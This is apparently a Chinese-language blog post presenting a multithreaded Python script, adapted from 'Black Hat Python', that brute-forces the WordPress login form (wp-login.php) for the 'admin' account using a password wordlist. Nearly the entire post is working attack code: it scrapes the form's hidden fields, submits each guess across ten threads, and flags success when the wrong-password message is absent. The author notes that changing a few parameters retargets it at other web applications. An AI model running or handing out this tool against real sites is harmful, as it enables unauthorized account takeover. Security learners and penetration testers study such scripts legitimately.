python多线程破解form登录(wordpress)

发表于 | 分类于 |

本文代码参考自《Black Hat Python: Python Programming for Hackers and Pentesters》
原书使用 urllib,urllib2,HTMLParser 等库实现,这里我用 requests 请求,pyquery 来解析,更加方便一点。
这里只要修改一下前面的几个参数即可使用于其他的 web 程序,原书本用于破解 joomla,这里我们改成了 wordpress。
书里的代码可以去python 代码仓库查看,这里用到的 dir_bruster 那个函数也在里面,我会不断更新这个仓库,push 一些学到的 python 代码,欢迎交流。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/python
#coding=utf-8

import requests
import Queue
import threading
import sys
from pyquery import PyQuery as pq
from dir_bruster import build_wordlist

thread_count = 10
#login form url
target_url = 'http://192.168.99.196/wordpress/wp-login.php'
#login form action url
target_post = 'http://192.168.99.196/wordpress/wp-login.php'
username_field = 'log'
password_field = 'pwd'
username = 'admin'
wordlist = build_wordlist('./pwd.txt')

class Bruster(object):
'''
    Brute web form using requests and pyquery
    This example is for wordpress, you can change these global params to brute other web app:)
'''
    def __init__(self, username, wordlist):
        self.username = username
        self.wordlist = wordlist
        self.found = False

    def run_brust(self):
        for n in range(thread_count):
            t = threading.Thread(target=self.brust_form)
            t.start()

    def brust_form(self):
        while not self.wordlist.empty() and not self.found:
            pwd = self.wordlist.get()
            try:
                s = requests.Session()
                res = s.get(target_url)
                body = self.parse(res.text)
                body[username_field] = self.username
                body[password_field] = pwd

                print('Trying %s:%s (%d left)' % (self.username, pwd, self.wordlist.qsize()))
                result = s.post(target_post, data=body)
                if '密码不正确' not in result.content:
                    self.found = True
                    print('Brute successful by %s:%s' % (self.username, pwd))
            except requests.ConnectionError as e:
                print(e)

    def parse(self, page):
        '''
            create post body
        '''
        par = pq(page)
        inputs = par.find('input')
        body = {}
        for n in inputs:
            if n.name is not None:
                body[n.name] = ''
            if n.value is not None:
                body[n.name] = n.value
        return body

b = Bruster(username, wordlist)
b.run_brust()